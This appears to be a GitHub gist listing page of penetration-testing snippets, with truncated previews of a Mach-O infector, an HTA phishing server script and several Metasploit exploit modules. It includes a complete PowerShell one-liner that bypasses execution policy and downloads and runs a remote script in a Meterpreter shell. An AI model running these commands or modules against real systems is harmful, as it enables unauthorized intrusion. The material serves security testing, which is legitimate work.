Skip to content

Instantly share code, notes, and snippets.

View carnal0wnage's full-sized avatar

Chris Gates carnal0wnage

949 followers · 129 following
View GitHub Profile
@carnal0wnage
carnal0wnage / osx_infector.py
Last active March 28, 2016 19:11 — forked from secretsquirrel/osx_infector.py
import os
import struct
import shutil
import subprocess
class macho_intel32_shellcode():
"""
Mach-O Intel x32 shellcode class
"""
@carnal0wnage
carnal0wnage / gist:08da32e8c2ace3cedf9a
Created January 21, 2015 20:28
PowerShell exec with Import Module to run in Meterpreter shell (remote file via IEX)
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
@carnal0wnage
carnal0wnage / gist:5b5980fc409782f52259
Last active October 18, 2018 23:10
PowerShell exec with Import Module to run in Meterpreter shell (local file)
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
@carnal0wnage
carnal0wnage / gist:457a3248ea36cfffc6c9
Last active August 2, 2016 22:00
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
function Receive-Request {
param(
$Request
)
$output = ""
@carnal0wnage
carnal0wnage / tomcat_mce_upload.rb
Last active August 29, 2015 14:06 — forked from infoslack/tomcat_mce_upload.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@carnal0wnage
carnal0wnage / simatic_wincc_harvester.rb
Last active August 29, 2015 14:06 — forked from atimorin/simatic_wincc_harvester.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
@carnal0wnage
carnal0wnage / shellinabox.rb
Last active August 29, 2015 14:06 — forked from bcoles/shellinabox.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
@carnal0wnage
carnal0wnage / nettemp_cmd_exec.rb
Last active August 29, 2015 14:06 — forked from bcoles/nettemp_cmd_exec.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
@carnal0wnage
carnal0wnage / zenoss_graph_pt.rb
Last active August 29, 2015 14:06 — forked from zeroSteiner/zenoss_graph_pt.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
@carnal0wnage
carnal0wnage / plex_windows_rce.rb
Last active August 29, 2015 14:06 — forked from phikshun/plex_windows_rce.rb
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Plex Code Execution Vulnerability',